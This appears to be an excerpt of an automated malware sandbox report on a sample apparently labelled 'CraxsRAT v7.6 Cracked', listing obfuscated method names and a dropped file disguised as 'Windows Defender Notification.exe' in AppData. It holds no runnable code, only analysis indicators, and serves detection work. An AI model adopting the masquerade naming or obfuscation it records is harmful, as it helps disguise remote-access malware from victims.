Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF848F4BA7D push E85A99D7h; ret	21_2_00007FF848F4BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF849012316 push 8B485F91h; iretd	21_2_00007FF84901231B
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F200BD pushad ; iretd	27_2_00007FF848F200C1

Source: Windows Defender Notification.exe.0.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: Windows Defender Notification.exe.0.dr, v9OXbFpunZ.cs	High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: Windows Defender Notification.exe.0.dr, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: Windows Defender Notification.exe.0.dr, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs	High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: Windows Defender Notification.exe.0.dr, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs	High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: Windows Defender Notification.exe.0.dr, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs	High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: Windows Defender Notification.exe.0.dr, uUAcd1V7wC.cs	High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: Windows Defender Notification.exe.0.dr, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs	High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: Windows Defender Notification.exe.0.dr, qOI2DzwDff.cs	High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, v9OXbFpunZ.cs	High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs	High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs	High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs	High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, uUAcd1V7wC.cs	High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs	High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, qOI2DzwDff.cs	High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: Windows Defender Notification.exe.10.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: Windows Defender Notification.exe.10.dr, v9OXbFpunZ.cs	High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: Windows Defender Notification.exe.10.dr, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: Windows Defender Notification.exe.10.dr, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs	High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
